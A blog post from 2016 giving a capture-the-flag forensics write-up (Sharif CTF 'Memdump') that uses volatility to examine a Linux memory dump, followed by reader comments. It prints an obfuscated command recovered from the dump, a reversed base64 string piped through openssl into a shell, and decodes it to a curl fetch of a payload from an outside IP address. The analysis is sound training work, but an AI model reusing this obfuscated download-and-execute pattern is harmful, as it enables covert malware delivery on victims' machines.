Sunday 7 February 2016

Sharif CTF 2016 Memdump [Forensics 400]

Question :

File : memdump.xz

Hints : Search for a complete string !! :-p

Solution : 

Well this was much interesting for me as i had gone through same kind of question in hackim16 but couldnt solve due to volatility profile issues.

doing a strings on file with grepping boot reveals the kernel used in the memory dump. Ubuntu 14.04 works good for it.

The blog i followed for volatility purpose :

I will leave the task of building up the profile and getting it work to you guys..
I got the ubuntu 14.04 x64 profile from here :

Assuming everything is setup . Lets get started ..

First lets dump the process:


so as descriptive from the image the command and process we are interested is very clear.

Now , lets dump bash.


Oopss.. thats a lot to investigate .. 

looking at the files..

Interesting bash history dump file.


The only thing you need to have is "PATIENCE" . Trust me on that while you read from strings command.

As the hint from admin said was look for a "complete string" when i told them what was interesting thing i found from openssl commands used but half strings displayed, when i did a strings command on task.1136.0x141c000.vma :

something like this : 

jL1IzLqt0TwF3b | rev | openssl enc -a -d | rev | . /dev/stdin > /tmp/.KvCf56'

so i did a grep on openssl with the strings command and look what i found ; 


commands :

input : echo "=owY1JHbg0ycggGd0BnOv8SN04SM4MjL1MjL1IzLqt0TwF3b" |  rev
output : b3FwT0tqLzI1LjM1LjM4MS40NS8vOnB0dGggcy0gbHJ1Ywo=

input : base64decode ("b3FwT0tqLzI1LjM1LjM4MS40NS8vOnB0dGggcy0gbHJ1Ywo=") , use the tool of choice.
output : oqpOKj/25.35.381.45//:ptth s- lruc

input : echo "oqpOKj/25.35.381.45//:ptth s- lruc" | rev
output : curl -s http://54.183.53.52/jKOpqo

download the file from the URL : http://54.183.53.52/jKOpqo



Lets unpack it .. Am not going through this.. Just follow this blog or google and you have enough resources explaining this.

Solving suctf2016 using suctf2014 :-D Lol..


Success but no flag :-(

Any help with strings ?? 


Unzipping the unpacked exe gives you a flag image in .rsrc -> FLAG -> IMG

Rename and get the flag !! Woah !! Sadly i got the unpacking after the show :-(


Thank you Sharif for this interesting challenge :-)

5 comments:

  1. hey dude, which challange was that a like in hackim16? can u please upload the challange files?

    ReplyDelete
    Replies
    1. Forensics500 was something similar. with kernel ubuntu 15 x86 it should work fine.

      Delete
    2. can u please upload chall files somewhere, couz i couldnt find it anywhere. thanks.

      Delete
    3. https://app.box.com/s/p8yjdphg8zc2n3yox5ir7bmsm6kaoono -> you can download from here..

      Delete
  2. challange files from that hackim16 i meant :)

    ReplyDelete

enter valid comments.Suggestions are most welcome and would be interested in correcting my mistakes.